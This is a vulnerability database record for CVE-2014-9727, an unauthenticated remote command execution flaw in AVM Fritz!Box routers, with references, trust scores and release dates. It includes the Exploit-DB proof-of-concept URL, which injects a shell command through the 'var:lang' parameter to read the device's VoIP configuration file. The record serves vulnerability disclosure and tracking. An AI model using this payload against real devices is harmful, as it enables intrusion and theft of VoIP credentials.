ID

VAR-E-201405-0185


CVE

cve_id:CVE-2014-9727

Trust: 1.9

sources: BID: 74927 // EXPLOIT-DB: 33136 // EDBNET: 57059

EDB ID

33136


TITLE

Fritz!Box - Remote Command Execution - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 33136

DESCRIPTION

Fritz!Box - Remote Command Execution. CVE-103289CVE-2014-9727 . webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 33136

AFFECTED PRODUCTS

vendor:fritz boxmodel: - scope: - version: -

Trust: 1.6

vendor:avmmodel:fritz!boxscope:eqversion:0

Trust: 0.3

sources: BID: 74927 // EXPLOIT-DB: 33136 // EDBNET: 57059

EXPLOIT

App : Fritz!Box
Author : 0x4148

Fritz!Box is Networking/voice Over ip router produced by AVM it suffer from Unauthenticated remote command execution flaw

Poc :
https://ip/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20cat%20/var/flash/voip.cfg%20%26

#0x4148_rise

Trust: 1.0

sources: EXPLOIT-DB: 33136

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 33136

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 33136

TYPE

Remote Command Execution

Trust: 1.0

sources: EXPLOIT-DB: 33136

CREDITS

0x4148

Trust: 0.6

sources: EXPLOIT-DB: 33136

EXTERNAL IDS

db:NVDid:CVE-2014-9727

Trust: 1.9

db:EXPLOIT-DBid:33136

Trust: 1.6

db:EDBNETid:57059

Trust: 0.6

db:BIDid:74927

Trust: 0.3

sources: BID: 74927 // EXPLOIT-DB: 33136 // EDBNET: 57059

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2014-9727

Trust: 1.6

url:https://www.exploit-db.com/exploits/33136/

Trust: 0.6

url:https://www.trustwave.com/resources/spiderlabs-blog/-honeypot-alert--fritz!box-%e2%80%93-remote-command-execution-exploit-attempt/

Trust: 0.3

url:http://en.avm.de/

Trust: 0.3

sources: BID: 74927 // EXPLOIT-DB: 33136 // EDBNET: 57059

SOURCES

db:BIDid:74927
db:EXPLOIT-DBid:33136
db:EDBNETid:57059

LAST UPDATE DATE

2022-07-27T09:30:06.451000+00:00


SOURCES UPDATE DATE

db:BIDid:74927date:2015-05-26T00:00:00

SOURCES RELEASE DATE

db:BIDid:74927date:2015-05-26T00:00:00
db:EXPLOIT-DBid:33136date:2014-05-01T00:00:00
db:EDBNETid:57059date:2014-05-01T00:00:00